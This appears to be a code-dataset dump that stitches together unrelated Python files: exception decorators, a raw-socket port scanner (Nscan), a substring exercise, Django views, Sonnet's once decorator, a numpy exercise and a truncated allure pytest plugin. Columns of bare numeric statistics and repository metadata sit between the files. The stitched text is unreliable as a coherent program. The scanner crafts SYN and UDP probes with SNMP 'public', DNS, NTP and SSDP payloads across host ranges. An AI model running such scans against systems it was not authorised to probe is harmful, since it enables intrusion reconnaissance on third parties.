        super(OptionParsingExit, self).__init__(msg)
        self.msg = msg
        self.status = status


# == DECORATORS FOR EXCEPTION HANDLING ==
# Exceptions that represent expected, user-facing failure modes.
EXPECTED_EXCEPTIONS = [HdfsError, SessionManagementException, CommandNotAllowedException,
                       CommandExecuteException, OptionParsingExit, OptionParsingError]


def handle_expected_exceptions(f):
    """A decorator that handles expected exceptions.

    `self` can be any object with a "send_error" method.

    Usage:
        @handle_expected_exceptions
        def fn(self, ...):
            ...
    """
    exceptions_to_handle = tuple(EXPECTED_EXCEPTIONS)

    @wraps(f)
    def wrapped(self, *args, **kwargs):
        try:
            out = f(self, *args, **kwargs)
        except exceptions_to_handle as err:
            # Do not log! as some messages may contain private client information
            self.send_error(EXPECTED_ERROR_MSG.format(err))
            return None
        else:
            return out
    return wrapped


def wrap_unexpected_exceptions(f, execute_if_error=None):
    """A decorator that catches all exceptions from `f` and alerts the user.

    `self` can be any object with a "logger" attribute and a "send_error"
    method. All exceptions are logged as "unexpected" exceptions.

    If there is an error, returns None when `execute_if_error` is None,
    otherwise returns the output of calling `execute_if_error`.

    Usage:
        @wrap_unexpected_exceptions
        def fn(self, ...):
            ...
    """
    @wraps(f)
    def wrapped(self, *args, **kwargs):
        try:
            out = f(self, *args, **kwargs)
        except Exception as e:
            self.logger.error(u"ENCOUNTERED AN INTERNAL ERROR: {}\n\tTraceback:\n{}".format(
                e, traceback.format_exc()))
            self.send_error(INTERNAL_ERROR_MSG.format(e))
            return None if execute_if_error is None else execute_if_error()
        else:
            return out
    return wrapped
32.482353
119
0.694314
339
2,761
5.530973
0.40118
0.048
0.037333
0.0128
0.1632
0.112
0.088533
0.0608
0.0608
0.0608
0
0.004212
0.226005
2,761
84
120
32.869048
0.873187
0.3908
0
0.428571
0
0
0.031697
0
0
0
0
0
0
1
0.119048
false
0.095238
0.095238
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc97538b8a2ee01ca9533565fe27426b9b8b241a
7,170
py
Python
latest/probe.py
Soldie/Nscan-scanner-ip
4a507ca97a9f8b7f3fa4766c835f108671dbbcd6
[ "Apache-2.0" ]
574
2015-01-30T13:02:42.000Z
2022-03-13T17:12:12.000Z
latest/probe.py
DiamondLink/Nscan
21a8986358107e5b86952cf9276510d14afc5ab6
[ "Apache-2.0" ]
10
2015-01-31T15:36:21.000Z
2021-11-17T10:46:33.000Z
latest/probe.py
DiamondLink/Nscan
21a8986358107e5b86952cf9276510d14afc5ab6
[ "Apache-2.0" ]
173
2015-01-30T13:05:36.000Z
2022-01-22T10:18:10.000Z
# Python 2 module (Queue, xrange, unbound `/` integer division are load-bearing).
# Raw-socket port-scanning core: crafts and sends probe packets, receives and
# filters replies, and feeds matches to per-script worker threads.
import time
import Queue
import random
import socket
import struct
import logging
import threading

from convert import *
from protocol import ethernet, ip, tcp, udp

ETH_P_IP = 0x0800  # IP protocol
ETH_P_ALL = 0x0003  # Every packet
NSCRIPT_PATH = 'nscript'  # NSCRIPT PATH
# Per-destination-port UDP probe payloads; anything else gets a generic payload.
PAYLOAD = {
    53: ('\x5d\x0d\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06'
         'google\x03com\x00\x00\x01\x00\x01'),  # 'google.com' DNS Lookup
    161: ('\x30\x26\x02\x01\x01\x04\x06public\xa1\x19\x02'
          '\x04\x56\x9f\x5a\xdd\x02\x01\x00\x02\x01\x00\x30\x0b\x30\x09\x06'
          '\x05\x2b\x06\x01\x02\x01\x05\x00'),  # SNMP GetNextRequest|public|2c version|1.3.6.1.2.1
    123: ('\x17\x00\x02\x05'),  # NTP systats commands lacks 38 null bytes (just to save bandwidth)
    1900: ('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
           'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
    }


class Generator(object):
    """Iterator over host offsets in [0, size).

    Walks the range with stride `inc` (size/4, at least 1) so probes to the
    same subnet are spread out in time; `suspend`/`resume` allow checkpointing
    a scan's position. Python 2 iterator protocol (`next`, not `__next__`).
    """

    def __init__(self, size):
        self.size = size
        self.inc = size/4  # py2 integer division; stride between consecutive offsets
        if self.inc < 1:
            self.inc = 1
        self.base = -self.inc
        self.num = self.base
        self.index = 0

    def __iter__(self):
        return self

    def next(self):
        # When the current pass would overrun the range, shift to the next
        # start offset (one earlier each pass) and continue striding.
        if (self.num+self.inc) >= self.size:
            self.next_index()
            self.next_base()
        self.num = self.num + self.inc
        return self.num

    def next_base(self):
        self.base = 0
        self.base -= self.index
        self.num = self.base

    def next_index(self):
        self.index += 1
        if self.index >= self.inc:
            # All `inc` interleaved passes are done -> iteration complete.
            raise StopIteration

    def suspend(self):
        """Return the full iterator state for later `resume`."""
        return self.size, self.inc, self.base, self.num, self.index

    def resume(self, size, inc, base, num, index):
        """Restore the state captured by `suspend`."""
        self.size = size
        self.inc = inc
        self.base = base
        self.num = num
        self.index = index


class ScriptEngine(object):
    """Loads nscript modules and fans matched (host, port) hits out to them.

    `imports` maps a script name to its list of (low, high) port ranges —
    presumably built by the caller from script metadata; TODO confirm.
    """

    def __init__(self, imports):
        self.imports = imports
        self.event = threading.Event()   # shared shutdown/ready signal for scripts
        self.queues = {}                 # script name -> its input Queue
        self.thread = []

    def Load(self):
        # Import each script from NSCRIPT_PATH and run it in a daemon thread;
        # each script consumes (host, port) tuples from its own queue.
        for script in self.imports:
            q = Queue.Queue()
            s = __import__('{}.{}'.format(NSCRIPT_PATH, script), fromlist=[NSCRIPT_PATH])
            t = threading.Thread(target=s.run, args=(q, self.event))
            self.thread.append(t)
            t.setDaemon(True)
            t.start()
            self.queues[script] = q

    def Feed(self, host, port):
        # Route a hit to every script whose port ranges contain `port`
        # (at most once per script thanks to the break).
        for scr in self.imports:
            for r in self.imports[scr]:
                if port in xrange(r[0], r[1]):
                    self.queues[scr].put((host, port))
                    break

    def Cleanup(self):
        # Poll until all script threads have exited.
        while Alive(self.thread):
            time.sleep(10)


class nscan(object):
    """Raw-socket scanner: one sender thread per host partition plus one receiver.

    Replies are matched to our probes via the source port and, for TCP, a
    SYN cookie (seq 0xDEADC0DE, so a valid SYN-ACK acks 0xDEADC0DF).
    """

    def __init__(self, options):
        self.options = options
        self.hosts = self.split(options.hosts, options.threads)
        self.ports = options.ports
        self.srcp = random.randint(1, 65535)  # self.PickPort() # source port
        self.smac = options.smac
        self.dmac = options.dmac
        self.ifname = options.ifname
        self.siface = options.siface
        self.diface = options.diface
        self.banner = options.banner
        self.count = options.count
        self.cooldown = options.cooldown  # (packets_per_pause, pause_seconds)
        self.queue = Queue.Queue()        # receiver publishes (src, srcp) hits here
        if options.stype.upper() == 'U':
            self.stype = socket.IPPROTO_UDP
        else:
            self.stype = socket.IPPROTO_TCP
        self.events = {
            'send': threading.Event(),
            'recv': threading.Event()}
        self.threads = {
            'send': [],
            'recv': None}

    def __Transport(self, src, dst=0):
        # Build the TCP or UDP transport header object; TCP probes carry the
        # fixed sequence number used as a SYN cookie by __CookieCheck.
        if self.stype == socket.IPPROTO_TCP:
            transport = tcp.TCP(src, dst)
            transport.seqn = 0xDEADC0DE
        else:
            transport = udp.UDP(src, dst)
        return transport

    def __Pack(self, transport, src, dst):
        # Attach the per-port payload (UDP only) and serialize header+payload.
        if self.stype == socket.IPPROTO_TCP:
            transport.payload = ''
        else:
            transport.payload = PAYLOAD.get(transport.dstp, '\x00\r\n\r\n')
        packed = transport.pack(src, dst)
        return packed + transport.payload

    def __CookieCheck(self, data):
        # Decide whether a received datagram answers one of our probes.
        # Offsets assume a 20-byte IP header before the transport header —
        # TODO confirm no IP options are ever present here.
        check = False
        dstp = struct.unpack('!H', data[22:24])[0]
        if self.stype == socket.IPPROTO_UDP:
            if dstp == self.srcp:
                check = True
        else:
            ackn = struct.unpack('!L', data[28:32])[0]
            flags = struct.unpack('B', data[33])[0] & 0b010010  # SYN-ACK
            if dstp == self.srcp and ackn == 0xDEADC0DF and flags == 18:
                check = True
        return check

    def init(self):
        """Create sender/receiver threads and generators; returns
        (threads, events, queue, generators) so the caller can run/checkpoint."""
        generators = []
        for h in self.hosts:
            g = Generator(h[1]-h[0])
            generators.append(g)
            t = threading.Thread(target=self.send, args=(h, self.srcp, g))
            t.setDaemon(True)
            self.threads['send'].append(t)
        t = threading.Thread(target=self.recv)
        t.setDaemon(True)
        self.threads['recv'] = t
        # Resuming a checkpointed scan: restore each generator's position.
        if 'resume' in dir(self.options):
            i = 0
            for g in generators:
                g.resume(*self.options.indexes[i])
                i += 1
        return self.threads, self.events, self.queue, generators

    def run(self):
        # Release both gates, then start every thread.
        self.events['send'].set()
        self.events['recv'].set()
        for t in self.threads['send']:
            t.start()
        self.threads['recv'].start()

    def send(self, hosts, srcp, gen):
        """Sender loop for one host partition: iterate hosts via `gen`,
        probe every configured port, throttle per `cooldown`."""
        if 'ppp' in self.ifname:
            # Point-to-point link: no Ethernet framing, kernel builds L2.
            family = socket.AF_INET
            proto = socket.IPPROTO_RAW
            eth = ''
        else:
            family = socket.AF_PACKET
            proto = ETH_P_IP
            eth = ethernet.ETHER(mac2byte(self.smac), mac2byte(self.dmac), ETH_P_IP).pack()
        sock = socket.socket(family, socket.SOCK_RAW, proto)
        transport = self.__Transport(srcp, 0)
        npacket = 0
        self.events['send'].wait()
        target = hosts[0]
        while self.events['send'].isSet():
            try:
                target = hosts[0] + gen.next()
                iph = ip.IP(self.diface, dec2dot(target), self.stype)
            except StopIteration:
                break
            for port_list in self.ports:
                for port in range(port_list[0], port_list[1]):
                    if self.events['send'].isSet():
                        transport.dstp = port
                        packet = eth + iph.pack() + self.__Pack(transport, iph.src, iph.dst)  # tcph.pack(iph.src, iph.dst)
                        sock.sendto(packet, (dec2dot(target), 0))  # self.ifname
                        npacket += 1
                        # Rate limit: sleep cooldown[1]s every cooldown[0] packets.
                        if not npacket % self.cooldown[0]:
                            time.sleep(self.cooldown[1])
                    else:
                        break
        logging.info('[SEND] Sent: {} packets'.format(npacket))
        sock.close()

    def recv(self):
        """Receiver loop: accept matching replies until `count` hits, then
        signal the senders to stop."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, self.stype)
        sock.bind(('', self.srcp))
        sock.settimeout(5)
        self.events['recv'].wait()
        counter = 0
        while self.events['recv'].isSet():
            try:
                data, sa_ll = sock.recvfrom(65535)
                if self.__CookieCheck(data):
                    self.queue.put(Extract(data))
                    counter += 1
                    if counter == self.count:
                        self.events['send'].clear()
                        break
            except socket.timeout:
                continue
        sock.close()
        logging.info('[RECV] Received: {} packets'.format(counter))

    def split(self, hosts, n):
        ''' Split host range into n parts (multithreaded) '''
        nhosts = hosts[1] - hosts[0]  # number of hosts
        nparts = nhosts/n + 1  # py2 integer division: per-thread chunk size
        host_parts = []
        start = hosts[0]
        while True:
            if len(host_parts) < n-1:
                end = start + nparts
                host_parts.append((start, end))
                start = end
            else:
                # Last chunk absorbs any remainder.
                host_parts.append((start, hosts[1]))
                break
        return host_parts

    def PickPort(self):
        # Currently unused (see __init__); NOTE(review): references self.sport,
        # which is never initialized — would raise AttributeError if called.
        while True:
            srcp = random.randrange(10000, 65535)
            if srcp not in self.sport:
                self.sport.append(srcp)
                break
        return srcp


def Extract(packet):
    """Extract (source IP, source port) from a raw IP packet; offsets assume
    a 20-byte IP header — TODO confirm no IP options."""
    src = socket.inet_ntoa(packet[12:16])
    srcp = struct.unpack('!H', packet[20:22])[0]
    return src, srcp


def Alive(thread_list):
    ''' check if thread is alive '''
    alive = False
    for t in thread_list:
        if t.isAlive():
            alive = True
            break
    return alive
28.228346
103
0.64728
1,066
7,170
4.287993
0.246717
0.021877
0.014439
0.024065
0.0676
0.02144
0.015751
0
0
0
0
0.043843
0.201534
7,170
253
104
28.339921
0.754585
0.037378
0
0.136929
0
0.016598
0.074129
0.040153
0
0
0.004707
0
0
0
null
null
0
0.062241
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc992600a7f421e186b8dbe2ed6b420847313d4c
1,473
py
Python
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
#######################################################################################################################
# Given a string, find the length of the longest substring which has no repeating characters.
#
# Input: String="aabccbb"
# Output: 3
# Explanation: The longest substring without any repeating characters is "abc".
#
# Input: String="abbbb"
# Output: 2
# Explanation: The longest substring without any repeating characters is "ab".
#
# Input: String="abccde"
# Output: 3
# Explanation: Longest substrings without any repeating characters are "abc" & "cde".
#######################################################################################################################


def longest_substring_no_repeating_char(input_str: str) -> int:
    """Return the length of the longest substring of input_str without repeated characters.

    Sliding-window scan: O(n) time, O(k) space for k distinct characters.

    BUGFIX/GENERALIZATION: the original used a fixed 26-slot table indexed by
    ord(ch) - 97, which only worked for lowercase a-z (uppercase, digits, or
    punctuation indexed out of range or collided). A dict of last-seen indices
    handles any characters and gives identical results on the original inputs.
    """
    window_start = 0
    max_window = 0
    last_seen = {}  # char -> index of its most recent occurrence
    for i, ch in enumerate(input_str):
        if ch in last_seen:
            # max() ensures the window start never moves backwards when the
            # repeated char's previous occurrence is already outside the window.
            window_start = max(window_start, last_seen[ch] + 1)
        last_seen[ch] = i
        max_window = max(max_window, i - window_start + 1)
    return max_window


print(longest_substring_no_repeating_char('aabccbb'))
print(longest_substring_no_repeating_char('abbbb'))
print(longest_substring_no_repeating_char('abccde'))
print(longest_substring_no_repeating_char('abcabcbb'))
print(longest_substring_no_repeating_char('bbbbb'))
print(longest_substring_no_repeating_char('pwwkew'))
40.916667
119
0.620502
175
1,473
4.954286
0.32
0.184544
0.145329
0.217993
0.425606
0.38985
0.140715
0.140715
0.140715
0
0
0.008621
0.133741
1,473
35
120
42.085714
0.670846
0.291242
0
0
0
0
0.046717
0
0
0
0
0
0
1
0.058824
false
0
0
0
0.117647
0.352941
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc9e5fe1655adc75064f69de338759361c073b11
2,563
py
Python
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
1
2021-03-15T07:24:10.000Z
2021-03-15T07:24:10.000Z
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
1
2021-04-11T01:22:24.000Z
2021-04-11T01:22:24.000Z
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
null
null
null
import requests
import django.contrib.auth as auth
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, JsonResponse, Http404
from django.contrib.auth.decorators import login_required
from django.core.serializers import serialize
from core.serializers import *
from core.models import *
from core.secrets import API_TOKEN, STRIPE_API_KEY
import json
from django.views.decorators.csrf import csrf_exempt

# Fields included in every serialized Tweeprint payload (was repeated inline
# in six views; hoisted so the list cannot drift between endpoints).
_TWEEPRINT_FIELDS = ('id', 'date_added', 'link', 'tweet_id', 'tweet_json',
                     'score', 'category', 'category_slug')


def _tweeprint_json_response(queryset):
    """Serialize a Tweeprint queryset to an application/json HttpResponse."""
    return HttpResponse(serialize('json', queryset, fields=_TWEEPRINT_FIELDS),
                        content_type="application/json")


def get_category(request, category):
    """All tweeprints whose category_slug matches `category`."""
    return _tweeprint_json_response(Tweeprint.objects.filter(category_slug=category))


def get_categories(request):
    """All category choice values defined on the model."""
    categories = [t[0] for t in Tweeprint.CHOICES]
    if request.method == 'GET':
        return JsonResponse(categories, safe=False)


def get_used_categories(request):
    """Distinct categories actually used by existing tweeprints."""
    used_categories = {t.category_slug: {'category': t.category, 'slug': t.category_slug}
                       for t in Tweeprint.objects.all()}.values()
    if request.method == 'GET':
        return JsonResponse(list(used_categories), safe=False)


def get_tweeprints(request):
    """All tweeprints, model default ordering."""
    if request.method == 'GET':
        return _tweeprint_json_response(Tweeprint.objects.all())


def get_most_recent(request):
    """All tweeprints, newest first."""
    if request.method == 'GET':
        return _tweeprint_json_response(Tweeprint.objects.all().order_by('-date_added'))


def get_most_popular(request):
    """All tweeprints, highest score first."""
    if request.method == 'GET':
        return _tweeprint_json_response(Tweeprint.objects.all().order_by('-score'))


@csrf_exempt
def submit(request):
    """Create a Tweeprint from a JSON POST body with 'link' and 'category'.

    BUGFIX: the original caught every exception, printed it, and still
    returned 'Submitted!' — reporting success on failure. Failures now get
    an HTTP 400 with the error message.
    """
    if request.method == 'POST':
        try:
            json_data = json.loads(request.body)
            Tweeprint.objects.create(link=str(json_data['link']),
                                     category=json_data['category'])
        except Exception as e:
            return HttpResponse('Submission failed: {}'.format(e), status=400)
        return HttpResponse('Submitted!')
    return HttpResponse("POST not made")
46.6
188
0.717909
321
2,563
5.570093
0.274143
0.053691
0.050336
0.050336
0.456935
0.428971
0.370805
0.370805
0.370805
0.370805
0
0.00457
0.146313
2,563
55
189
46.6
0.812614
0
0
0.173913
0
0
0.157176
0
0
0
0
0
0
1
0.152174
false
0
0.26087
0
0.586957
0.26087
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5d7e286fce65b02bbb505a551034d0638886042d
2,764
py
Python
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
10,287
2017-04-07T12:33:37.000Z
2022-03-30T03:32:16.000Z
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
209
2017-04-07T15:57:11.000Z
2022-03-27T10:43:03.000Z
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
1,563
2017-04-07T13:15:06.000Z
2022-03-29T15:26:04.000Z
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utility to run functions and methods once."""

import uuid

from sonnet.src import utils

# Name of the per-instance attribute holding the set of once-ids that have
# already executed for that instance.
_ONCE_PROPERTY = "_snt_once"


def _check_no_output(output):
  # @snt.once functions are called for their side effects only; a non-None
  # return would be silently discarded, so reject it loudly.
  if output is not None:
    raise ValueError("@snt.once decorated functions cannot return values")


def once(f):
  """Decorator which ensures a wrapped method is only ever run once.

  >>> @snt.once
  ... def f():
  ...   print('Hello, world!')
  >>> f()
  Hello, world!
  >>> f()
  >>> f()

  If `f` is a method then it will be evaluated once per instance:

  >>> class MyObject:
  ...   @snt.once
  ...   def f(self):
  ...     print('Hello, world!')

  >>> o = MyObject()
  >>> o.f()
  Hello, world!
  >>> o.f()

  >>> o2 = MyObject()
  >>> o2.f()
  Hello, world!
  >>> o.f()
  >>> o2.f()

  If an error is raised during execution of `f` it will be raised to the user.
  Next time the method is run, it will be treated as not having run before.

  Args:
    f: A function to wrap which should only be called once.

  Returns:
    Wrapped version of `f` which will only evaluate `f` the first time it is
    called.
  """
  # Unique id for THIS decoration; distinguishes different @once methods
  # sharing one instance's seen-set.
  # TODO(tomhennigan) Perhaps some more human friendly identifier?
  once_id = uuid.uuid4()

  @utils.decorator
  def wrapper(wrapped, instance, args, kwargs):
    """Decorator which ensures a wrapped method is only ever run once."""
    if instance is None:
      # Free function (or method accessed on the class): track "has run"
      # with a flag on the wrapper itself.
      # NOTE: We can't use the weakset since you can't weakref None.
      if not wrapper.seen_none:
        _check_no_output(wrapped(*args, **kwargs))
        # Flag is set only after a successful call, so a raising `f` is
        # treated as never having run (see docstring).
        wrapper.seen_none = True
      return

    # Get or set the `seen` set for this object.
    seen = getattr(instance, _ONCE_PROPERTY, None)
    if seen is None:
      seen = set()
      setattr(instance, _ONCE_PROPERTY, seen)

    if once_id not in seen:
      _check_no_output(wrapped(*args, **kwargs))
      seen.add(once_id)

  wrapper.seen_none = False

  decorated = wrapper(f)  # pylint: disable=no-value-for-parameter,assignment-from-none
  # Expose the undecorated function for introspection by other Sonnet code.
  decorated.__snt_once_wrapped__ = f
  return decorated
28.494845
87
0.634949
386
2,764
4.471503
0.42487
0.034762
0.017381
0.01854
0.112399
0.112399
0.060255
0.060255
0.060255
0.060255
0
0.005682
0.23589
2,764
96
88
28.791667
0.811553
0.655933
0
0.076923
0
0
0.068685
0
0
0
0
0.010417
0
1
0.115385
false
0
0.076923
0
0.269231
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5d8772d2443bc37d077b4e1088b8652b560de433
387
py
Python
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
2
2020-05-28T07:15:00.000Z
2020-07-21T08:34:06.000Z
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
null
null
null
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
null
null
null
import numpy as np

if __name__ == '__main__':
    # HackerRank "Min and Max": read an h x w integer grid from stdin, take
    # the minimum of each row, and print the maximum of those minima.
    height, _width = (int(token) for token in input().split())
    grid_rows = [np.array([int(token) for token in input().split()])
                 for _ in range(height)]
    per_row_minimum = np.min(grid_rows, axis=1)
    print(np.max(per_row_minimum))
15.48
56
0.573643
61
387
3.229508
0.47541
0.142132
0.111675
0.162437
0
0
0
0
0
0
0
0.003663
0.294574
387
24
57
16.125
0.717949
0
0
0
0
0
0.020779
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.090909
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d87b775f0d8dfc2c8f2bb9538693bb8aa0d1ec6
22,757
py
Python
allure/pytest_plugin.py
allure-framework/allure-pytest
d55180aaeb21233e7ca577ffc6f67a07837c63f2
[ "Apache-2.0" ]
112
2017-01-24T21:37:49.000Z
2022-03-25T22:32:12.000Z
venv/Lib/site-packages/allure/pytest_plugin.py
Arthii01052/conduit
3427d76d0fa364cb5d19bdd6da4aeb0a22fe9660
[ "MIT" ]
56
2017-01-21T20:01:41.000Z
2019-01-14T13:35:53.000Z
venv/Lib/site-packages/allure/pytest_plugin.py
Arthii01052/conduit
3427d76d0fa364cb5d19bdd6da4aeb0a22fe9660
[ "MIT" ]
52
2017-01-23T13:40:40.000Z
2022-03-30T00:02:31.000Z
import uuid import pickle import pytest import argparse from collections import namedtuple from six import text_type from allure.common import AllureImpl, StepContext from allure.constants import Status, AttachmentType, Severity, \ FAILED_STATUSES, Label, SKIPPED_STATUSES from allure.utils import parent_module, parent_down_from_module, labels_of, \ all_of, get_exception_message, now, mangle_testnames from allure.structure import TestCase, TestStep, Attach, TestSuite, Failure, TestLabel def pytest_addoption(parser): parser.getgroup("reporting").addoption('--alluredir', action="store", dest="allurereportdir", metavar="DIR", default=None, help="Generate Allure report in the specified directory (may not exist)") severities = [v for (_, v) in all_of(Severity)] def label_type(name, legal_values=set()): """ argparse-type factory for labelish things. processed value is set of tuples (name, value). :param name: of label type (for future TestLabel things) :param legal_values: a `set` of values that are legal for this label, if any limit whatsoever :raises ArgumentTypeError: if `legal_values` are given and there are values that fall out of that """ def a_label_type(string): atoms = set(string.split(',')) if legal_values and not atoms < legal_values: raise argparse.ArgumentTypeError('Illegal {} values: {}, only [{}] are allowed'.format(name, ', '.join(atoms - legal_values), ', '.join(legal_values))) return set((name, v) for v in atoms) return a_label_type parser.getgroup("general").addoption('--allure_severities', action="store", dest="allureseverities", metavar="SEVERITIES_SET", default={}, type=label_type(name=Label.SEVERITY, legal_values=set(severities)), help="""Comma-separated list of severity names. Tests only with these severities will be run. 
Possible values are:%s.""" % ', '.join(severities)) parser.getgroup("general").addoption('--allure_features', action="store", dest="allurefeatures", metavar="FEATURES_SET", default={}, type=label_type(name=Label.FEATURE), help="""Comma-separated list of feature names. Run tests that have at least one of the specified feature labels.""") parser.getgroup("general").addoption('--allure_stories', action="store", dest="allurestories", metavar="STORIES_SET", default={}, type=label_type(name=Label.STORY), help="""Comma-separated list of story names. Run tests that have at least one of the specified story labels.""") def pytest_configure(config): reportdir = config.option.allurereportdir if reportdir: # we actually record something allure_impl = AllureImpl(reportdir) testlistener = AllureTestListener(config) pytest.allure._allurelistener = testlistener config.pluginmanager.register(testlistener) if not hasattr(config, 'slaveinput'): # on xdist-master node do all the important stuff config.pluginmanager.register(AllureAgregatingListener(allure_impl, config)) config.pluginmanager.register(AllureCollectionListener(allure_impl)) class AllureTestListener(object): """ Per-test listener. Is responsible for recording in-test data and for attaching it to the test report thing. The per-test reports are handled by `AllureAgregatingListener` at the `pytest_runtest_logreport` hook. """ def __init__(self, config): self.config = config self.environment = {} self.test = None # FIXME: that flag makes us pre-report failures in the makereport hook. # it is here to cope with xdist's begavior regarding -x. 
# see self.pytest_runtest_makereport and AllureAgregatingListener.pytest_sessionfinish self._magicaldoublereport = hasattr(self.config, 'slaveinput') and self.config.getvalue("maxfail") @pytest.mark.hookwrapper def pytest_runtest_protocol(self, item, nextitem): try: # for common items description = item.function.__doc__ except AttributeError: # for doctests that has no `function` attribute description = item.reportinfo()[2] self.test = TestCase(name='.'.join(mangle_testnames([x.name for x in parent_down_from_module(item)])), description=description, start=now(), attachments=[], labels=labels_of(item), status=None, steps=[], id=str(uuid.uuid4())) # for later resolution in AllureAgregatingListener.pytest_sessionfinish self.stack = [self.test] yield self.test = None self.stack = [] def attach(self, title, contents, attach_type): """ Store attachment object in current state for later actual write in the `AllureAgregatingListener.write_attach` """ attach = Attach(source=contents, # we later re-save those, oh my... title=title, type=attach_type) self.stack[-1].attachments.append(attach) def dynamic_issue(self, *issues): """ Attaches ``issues`` to the current active case """ if self.test: self.test.labels.extend([TestLabel(name=Label.ISSUE, value=issue) for issue in issues]) def description(self, description): """ Sets description for the test """ if self.test: self.test.description = description def start_step(self, name): """ Starts an new :py:class:`allure.structure.TestStep` with given ``name``, pushes it to the ``self.stack`` and returns the step. 
""" step = TestStep(name=name, title=name, start=now(), attachments=[], steps=[]) self.stack[-1].steps.append(step) self.stack.append(step) return step def stop_step(self): """ Stops the step at the top of ``self.stack`` """ step = self.stack.pop() step.stop = now() def _fill_case(self, report, call, pyteststatus, status): """ Finalizes with important data :param report: py.test's `TestReport` :param call: py.test's `CallInfo` :param pyteststatus: the failed/xfailed/xpassed thing :param status: a :py:class:`allure.constants.Status` entry """ [self.attach(name, contents, AttachmentType.TEXT) for (name, contents) in dict(report.sections).items()] self.test.stop = now() self.test.status = status if status in FAILED_STATUSES: self.test.failure = Failure(message=get_exception_message(call.excinfo, pyteststatus, report), trace=report.longrepr or hasattr(report, 'wasxfail') and report.wasxfail) elif status in SKIPPED_STATUSES: skip_message = type(report.longrepr) == tuple and report.longrepr[2] or report.wasxfail trim_msg_len = 89 short_message = skip_message.split('\n')[0][:trim_msg_len] # FIXME: see pytest.runner.pytest_runtest_makereport self.test.failure = Failure(message=(short_message + '...' * (len(skip_message) > trim_msg_len)), trace=status == Status.PENDING and report.longrepr or short_message != skip_message and skip_message or '') def report_case(self, item, report): """ Adds `self.test` to the `report` in a `AllureAggegatingListener`-understood way """ parent = parent_module(item) # we attach a four-tuple: (test module ID, test module name, test module doc, environment, TestCase) report.__dict__.update(_allure_result=pickle.dumps((parent.nodeid, parent.module.__name__, parent.module.__doc__ or '', self.environment, self.test))) @pytest.mark.hookwrapper def pytest_runtest_makereport(self, item, call): """ Decides when to actually report things. 
pytest runs this (naturally) three times -- with report.when being: setup <--- fixtures are to be initialized in this one call <--- when this finishes the main code has finished teardown <--- tears down fixtures (that still possess important info) `setup` and `teardown` are always called, but `call` is called only if `setup` passes. See :py:func:`_pytest.runner.runtestprotocol` for proofs / ideas. The "other side" (AllureAggregatingListener) expects us to send EXACTLY ONE test report (it wont break, but it will duplicate cases in the report -- which is bad. So we work hard to decide exact moment when we call `_stop_case` to do that. This method may benefit from FSM (we keep track of what has already happened via self.test.status) Expected behavior is: FAILED when call fails and others OK BROKEN when either setup OR teardown are broken (and call may be anything) PENDING if skipped and xfailed SKIPPED if skipped and not xfailed """ report = (yield).get_result() status = self.config.hook.pytest_report_teststatus(report=report) status = status and status[0] if report.when == 'call': if report.passed: self._fill_case(report, call, status, Status.PASSED) elif report.failed: 